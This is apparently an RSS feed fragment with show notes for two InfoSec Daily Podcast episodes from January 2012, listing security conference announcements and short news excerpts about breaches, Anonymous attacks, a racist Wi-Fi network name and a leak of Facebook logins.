<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bigot named their WiFi signal &ldquo;F&#8212; All Jews and N&#8212;-&rdquo; &mdash; and now cops are investigating.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hateful signal I.D. popped up on the iPhone of a 28-year-old mom inside a Teaneck, N.J. recreation center, where her 3-year-old daughter was attending dance class.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The offending signal was coming from a router connected in the Richard Rodda Community Center in the the township, located 10 miles outside New York City.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.huffingtonpost.com/2012/01/20/aaron-barr-cybersecurity-anonymous-occupy-wall-street_n_1219328.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.huffingtonpost.com/2012/01/20/aaron-barr-cybersecurity-anonymous-occupy-wall-street_n_1219328.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just last week Aaron Barr, the former HBGary Federal CEO whose email was hacked by Anonymous in February, was &quot;schooling&quot; the FBI on security and social media. Now he&#39;s been let go from his new job at another federal contractor, Sayres and Associates. His former boss at Sayres told HuffPost it was because Barr was acting like a &quot;cowboy&quot; on the company dime.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Barr&#39;s strange year in the public eye began in early 2011. At the time he was the CEO at HBGary Federal, an information security contractor working with both federal government agencies and with outside firms. In a Feb. 4 article, he claimed to the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Financial Times</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that he was on the cusp of exposing the leaders behind the loose-knit confederation of hackers and activists known as Anonymous.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Anons struck back, releasing thousands of internal emails from HBGary Federal &#8212; emails that showed that HBGary Federal was working for a law firm, which was in turn working for the U.S. Chamber of Commerce, to hurt Wikileaks by feeding it false information and discrediting its supporters in the media.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2012/01/20/new-google-accounts-require-gmail-and-g-accounts/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2012/01/20/new-google-accounts-require-gmail-and-g-accounts/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google appears to have made some changes to its account creation process. Whereas before, all it took was an email address of any kind and some basic demographic data, now you are required to create both a Gmail account and a presence on Google+. This doesn&rsquo;t strike me as a user-friendly change.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On one hand, it&rsquo;s harmless in a way: you create a throwaway email address and a dummy G+ account if you don&rsquo;t want to use them. Problem solved. But is that really a step people should have to take if they just want to use Google Docs or YouTube? Certainly Google will say that this is all about the integration of services, but part of the attraction of Google services has always been how you can just use one or the other. This forced-signup device smells of an attempt to boost G+ numbers, and is reminiscent not of the Google of yore, but of the Apple and Facebook of today.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://techcrunch.com/2012/01/20/dreamhost-hacked-password-changes-made-mandatory/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2012/01/20/dreamhost-hacked-password-changes-made-mandatory/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another day, another hack. The company whose data was compromised this time? DreamHost.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to DreamHost&rsquo;s status blog, the company detected &ldquo;unauthorized activity within one of [their] databases&rdquo;. In other words: someone was snooping around where they shouldn&rsquo;t have been snooping, and DreamHost noticed the foot prints.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Alas, the company isn&rsquo;t divulging much information as to the nature of the hack, beyond that they &ldquo;don&rsquo;t have evidence that customer passwords were taken at this time&rdquo;. Still, they&rsquo;re requiring password resets for all Shell/FTP accounts (read: not the account that DreamHost customers use to login to the billing/backend system, but the user accounts they use to access and maintain their actual websites.) for what seems to be </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">all</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> DreamHost customers. If you find yourself having trouble logging into your DreamHost FTP accounts today, it&rsquo;s because your password has already been disabled.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nationaljournal.com/tech/hackers-claim-responsibility-for-temporarily-felling-cbs-com-after-attacking-doj-site-20120122?mrefid=related2"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nationaljournal.com/tech/hackers-claim-responsibility-for-temporarily-felling-cbs-com-after-attacking-doj-site-20120122?mrefid=related2</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A group of hackers temporarily wiped clean CBS.com, in what seemed to be further retaliation for the government shutdown last week of file-sharing site Megaupload.com. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Several Twitter accounts linked to Anonymous, a loosely organized collective of hackers, posted messages claiming responsibility for the hack, some of them </span><a href="https://twitter.com/#%21/AnonNewsSEC/status/161143476602417152"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">mentioning</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &quot;#OpMegaUpload,&quot; shorthand for Operation Mega Upload. At least one suggested Fox would be targeted next.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group claimed responsibility for hacking the Justice Department&#39;s website earlier in the week after federal officials shut down Megaupload.com.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For a short period, visitors to CBS.com were presented with a single blank HTML file around mid-day on Sunday. The site has since been restored.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.scmagazine.com/arab-facebook-logins-posted-by-israeli-hacker/article/224338"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazine.com/arab-facebook-logins-posted-by-israeli-hacker/article/224338</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In four separate posting on Saturday to the Pastebin website, an Israeil hacker calling himself Hannibal announced he had published emails and logins of 100,000 allegedly Arab Facebook users. He also made the data available on 14 other file-sharing sites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a published report by an investigator who downloaded the data from the file-sharing sites, the number of stolen Facebook accounts is likely closer to 20,000.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The self-professed &quot;general of Israel&#39;s hackers&quot; claimed to have about 30 million email accounts, 10 million bank accounts and four million credit cards of Arabs from all over the world. His purpose, he stated, is to display his strength &quot;to save Israel&quot; from cyber attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Arabs should learn a lesson and know not to mess with me,&quot; he wrote.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hannibal&#39;s actions are apparently in retaliation for a data dump earlier this month when OxOmar, who claimed to be a member of a Saudi hacking gang Group-XP, declared he had posted banking details on 400,000 Israelis. Israeil banks refuted the claim, asserting that most of the data was outdated and that in actuality only 14,000 records were exposed.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-575-racist-router-aaron-gets-axed-g-required-dreamhosts-nightmare-cbs-hannibal/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3408/0/infosec-daily-podcast-episode-575.mp3" length="15912761" type="audio/mpeg" />
		<itunes:duration>0:32:42</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 575 for January 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 575 for January 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135
&#160;
A bigot named their WiFi signal &#8220;F&#8212; All Jews and N&#8212;-&#8221; &#8212; and now cops are investigating.
&#160;
The hateful signal I.D. popped up on the iPhone of a 28-year-old mom inside a Teaneck, N.J. recreation center, where her 3-year-old daughter was attending dance class.
&#160;
The offending signal was coming from a router connected in the Richard Rodda Community Center in the the township, located 10 [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-574-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-574-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 22 Jan 2012 12:07:54 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3404</guid>
		<description><![CDATA[&#160; Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 574 for January 21, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester. &#160; Guests: aricon, coolacid, connection, and spridel &#160; Announcements: Unsung Heroes Have you ever stumbled on your tool while walking and wondered &#8220;Why didn&#8217;t I [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 574 for January 21, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.</span></b></p>
<p>&nbsp;</p>
<p><b><span>Guests: aricon, coolacid, connection, and spridel</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heroes</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on your tool while walking and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p><b><br />
		<span>Information Security Blogger Awards 2012</span><br />
		<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><span>ashimmy@hotmail.com</span><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on</span><a href="http://www.ashimmy.com/"><span> </span><span>www.ashimmy.com</span></a><span>.</span></b></p>
<p><b><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></b></p>
<p><b><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></b></p>
<p><b><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></b></p>
<p><b><span>CampusCon 2012</span><br />
		<span>When: January 21, 2012</span><br />
		<span>Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#039;s Road</span><br />
		<a href="http://campuscon.hackingwit.com/"><span>http://campuscon.hackingwit.com</span></a><br />
		<span>(from Baconzombie)</span></b></p>
<p><b><span>New England InfoSec Tweetup</span><br />
		<span>When: January 21, 2012</span><br />
		<span>Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
		<a href="http://neistu3.eventbrite.com/"><span>http://neistu3.eventbrite.com/</span></a></b></p>
<p><b><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
		<span>When: Starts January 24, 2012</span><br />
		<span>Where: Atlanta, GA</span><br />
		<span>Discount Code:</span><br />
		<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></b></p>
<p><b><span>ShmooCon 2012</span><br />
		<span>When: January 27th-29th, 2012</span><br />
		<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
		<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></b></p>
<p><b><span>Schmoocon Epilogue</span><br />
		<span>When: After Schmoocon</span><br />
		<span>Where: Washington, DC</span><br />
		<span>Hit up anyone in NOVA Hackers</span><br />
		<a href="http://shmooconepilogue.eventbrite.com/"><span>http://shmooconepilogue.eventbrite.com/</span></a></b></p>
<p><b><span>Metasploit Framework Unleashed Cincinnati</span><br />
		<span>When: February 11, 2012.</span><br />
		<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
		<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
		<span>$20 donation for #HFC</span></b></p>
<p><b><span>Social Engineering Training with Chris Hadgany</span><br />
		<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
		<br />
		Where: Seattle, Washington</span><br />
		<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
		<br />
		Where: Black Hat Vegas</span><br />
		<span>When: August 20-24, 2012</span><br />
		<span>Where: &nbsp;Bristol, UK</span><br />
		<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
		<br />
		Where: &nbsp;Columbia, MD</span><br />
		<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span>BSides Chicago<br class="kix-line-break" /><br />
		<br />
		</span><span>When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
		<br />
		Where: Volcano Room (further info coming)</span><br />
		<span>Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
		<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span>http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
		<span>They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></b></p>
<p><b><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<span>Huntington, West Virginia</span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>LayerOne 2012</span><br />
		<span>When: May 26-27, 2012</span><br />
		<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
		<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><a href="http://arstechnica.com/tech-policy/news/2012/01/internet-wins-sopa-and-pipa-both-shelved.ars"><span> </span></a></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Pentest Lessons:</span></b></p>
